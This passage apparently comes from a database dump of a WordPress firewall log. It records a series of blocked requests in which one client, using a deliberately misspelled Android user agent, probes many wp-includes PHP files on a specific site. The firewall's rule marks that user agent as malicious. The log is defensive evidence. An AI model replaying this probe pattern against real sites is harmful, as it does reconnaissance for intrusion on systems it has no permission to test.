User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1BIUE1haWxlci93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133805,1699930567.334382,1699930567.319100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-value.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItdmFsdWUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133817,1699930931.843376,1699930931.809500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Net/IPv6.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9OZXQvSVB2Ni5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133806,1699930800.748394,1699930800.739200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Redis.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9SZWRpcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133807,1699930794.788910,1699930794.780200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/MySQL.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9NeVNRTC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133808,1699930787.896543,1699930787.874900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Memcached.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9NZW1jYWNoZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133816,1699930940.345423,1699930940.331300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Parse/Date.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9QYXJzZS9EYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133809,1699930773.766356,1699930773.753300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Memcache.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9NZW1jYWNoZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133958,1699932237.321678,1699932237.312300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWJsb2NrLXBhdHRlcm4tY2F0ZWdvcmllcy1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133904,1699931517.254990,1699931517.245900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json-data.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24tZGF0YS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133810,1699930769.197645,1699930769.188600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/File.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9GaWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133811,1699930765.575461,1699930765.565900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/DB.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9EQi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133815,1699930947.765510,1699930947.756100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Parser.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9QYXJzZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133812,1699930758.880719,1699930758.865600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Base.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9CYXNlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133813,1699930813.981898,1699930813.972900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Caption.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYXB0aW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133814,1699930952.821126,1699930952.811600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Rating.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9SYXRpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133834,1699930999.443857,1699930999.434500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Source.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Tb3VyY2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133897,1699931607.386647,1699931607.377800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-background-image-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtYmFja2dyb3VuZC1pbWFnZS1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133835,1699930991.614452,1699930991.605400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Sanitize.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9TYW5pdGl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133836,1699930985.714728,1699930985.693000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Restriction.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9SZXN0cmljdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133837,1699930962.603075,1699930962.589000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Registry.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9SZWdpc3RyeS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133896,1699931616.211290,1699931616.201800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-background-image-setting.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtYmFja2dyb3VuZC1pbWFnZS1zZXR0aW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133838,1699931098.918274,1699931098.904100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/assets/script-loader-react-refresh-entry.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Fzc2V0cy9zY3JpcHQtbG9hZGVyLXJlYWN0LXJlZnJlc2gtZW50cnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133839,1699931091.791067,1699931091.782400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/assets/script-loader-react-refresh-entry.min.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Fzc2V0cy9zY3JpcHQtbG9hZGVyLXJlYWN0LXJlZnJlc2gtZW50cnkubWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133840,1699931087.936588,1699931087.927600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/assets/script-loader-packages.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Fzc2V0cy9zY3JpcHQtbG9hZGVyLXBhY2thZ2VzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133961,1699932223.639213,1699932223.616800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWF0dGFjaG1lbnRzLWNvbnRyb2xsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133895,1699931620.865523,1699931620.856100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-background-position-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 